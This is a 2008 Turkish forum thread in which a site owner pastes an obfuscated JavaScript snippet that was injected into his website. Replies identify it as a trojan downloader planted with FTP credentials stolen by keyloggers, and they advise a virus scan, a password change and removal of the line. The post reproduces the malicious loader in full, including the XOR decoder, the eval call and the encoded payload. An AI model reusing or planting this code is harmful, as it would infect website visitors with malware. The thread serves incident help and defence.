Ceviz Forum

Geri Dön   Ceviz Forum > Sistem > Ağ / Güvenlik

Cevapla
 
LinkBack Seçenekler
Eski 25/04/2008, 13:46   #1 (permalink)
Üye
 
Üyelik Tarihi: 04/2008
Mesaj: 20
Varsayılan ilginç bir durum ile karşı karşıya kaldım bir js kodu eklenmiş.

Kod:
 <script language=JavaScript>function xsiban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,27,16,39,20,51,15,48,26,13,0,0,0,0,0,0,46,42,6,55,10,31,17,49,0,19,8,32,18,29,41,33,34,7,61,5,52,53,30,38,35,12,40,0,0,0,0,56,0,11,23,36,37,44,45,1,9,21,25,57,2,47,3,59,60,43,54,24,14,4,50,62,58,28,22);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(249^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}xsiban('tlkdM8NXbqsXsrJXDLeCR8kdyxf7M8NWYLh3br_Ut@Jc9vjTVbYcE@JW4vjrbPhdyLevYCy3jq_P8LprFrsXhteUzohW9vj58zhc8DNPbEh398MXz1eCLIaW9BkUa8hXbrjTTPjXFVRPsVj3zLjT26Rv9np56nfTVqY59CNCLoRrjoJcMrscuCevg3McylN3FrJGYoyrDrJKivhG1ChcDWsdsl_7b8kdy@RGS19cE@JW4vkGVn9')</script>
bir sabah uyandıgımda sitenin bir dosyasına bu satır eklenmiş nasıl ve ne amaç ile eklenmiş olabişir?
Cronic hatta değil   Alıntı Yaparak Yanıtla
Eski 25/04/2008, 13:51   #2 (permalink)
Assembly Coder
 
kostebek Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 06/2007
Mesaj: 376
Varsayılan

Linux sunucu ise SHELL dediğimiz betikleri bir şekilde sitene eklemiş olabilir. Şüpheli yerler: dosya, resim vs upload edilen yerler olabilir.

Dosyayı çalıştırdım Kaspesky Trojan buldu 2 tane
__________________
http://harmankaya.org - Sanal Malikanem
http://85.103.169.53/- Ev Sunucum
kostebek hatta değil   Alıntı Yaparak Yanıtla
Eski 25/04/2008, 13:55   #3 (permalink)
Üye
 
Üyelik Tarihi: 04/2008
Mesaj: 20
Varsayılan

Bu normal bir durum mu çünki sitenin çalışmasında problem yaratıyor... neden kaynaklanmış olabilir...
Cronic hatta değil   Alıntı Yaparak Yanıtla
Eski 25/04/2008, 14:28   #4 (permalink)
self.life.start()
 
Raiden Adlı Üyenin Profil Grafiği
 
Üyelik Tarihi: 10/2004
Yer: /home/Raiden
Mesaj: 2,521
Varsayılan

cronic bu şu şekilde yerleşiyor. bilgisayara bulaşan bir worm malware vs tarzı programlar keylogger tutup bir yere gönderiyor bilgileri alanlarda ftp ile bağlanıp bu js downloader yerleştiriyorlar. öncelikle bilgisayarını virüs kontrolünden geçir ardından. ftp bilgilerini değiştir şifreni sonra da ilgili satırı sil.
__________________
Yusuf KOÇ

"aramaya inanmayanlar suphesiz ki kaybedenlerden olacaktirlar"
Raiden hatta değil   Alıntı Yaparak Yanıtla
Cevapla

Bookmarks

Seçenekler

Mesaj Yazma Hakları
Yeni mesajgöndermezsiniz
Cevap yazamazsınız
Dosya ekleyemezsiniz
Mesajınızı düzenleyemezsiniz

BB code is Açık
[IMG] kodu Açık
HTML kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık

Benzer Konular
Konu Konuyu açana göre Forum Cevap En Son Mesaj
Çalışan Durum Çubuğu Kodu - İnternet Explorer 7 dahil vezir Javascript / DHTML / Ajax 6 04/05/2007 21:41
sohbette ilginç bir durum fatih35 Uygulama Yazılımları / Hazır Betikler 2 29/03/2007 14:14
Flood saldırılarına karşı alınabilecek - güvenlik kodu harici - önlemler Yns PHP 13 20/12/2006 19:22
Sorguda ilginç bir durum grafmaster PHP 12 21/10/2005 01:12
ilginç bir durum.. HiperAktif® Hayata Dair 0 20/03/2004 09:42


Forum saati Türkiye saatine göredir. GMT +3. Şu anda saat 10:43.

Reklamlar & Desteklenenler
Hassas Valf | Hassas Kaplama | Antalyamız | Gazete | Ticari Bilişim | Hakan Müştak | Rüya Tabirleri | Kadın | Hastalıklar | Cepte msn ve e-posta | Webmaster | Antalya Aupair | Turkish Property Antalya | Forum | Chat | Perde | Adsl | Araba | bolindir.com | guncelle.com | livescore | Web Tasarım | evden eve nakliyat | forum | evden eve | sohbet | Resimcim| Kalifiye İnsan Kaynakları | Web Tasarım | Oyun | Yusuf KOÇ | Akın Yorulmaz | şiir | UFO | Web Tasarım | Oyunlar | Canlı Tv |


Forum Yazılımı: vBulletin Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0
Copyright ©2001 - 2008, Ceviz.net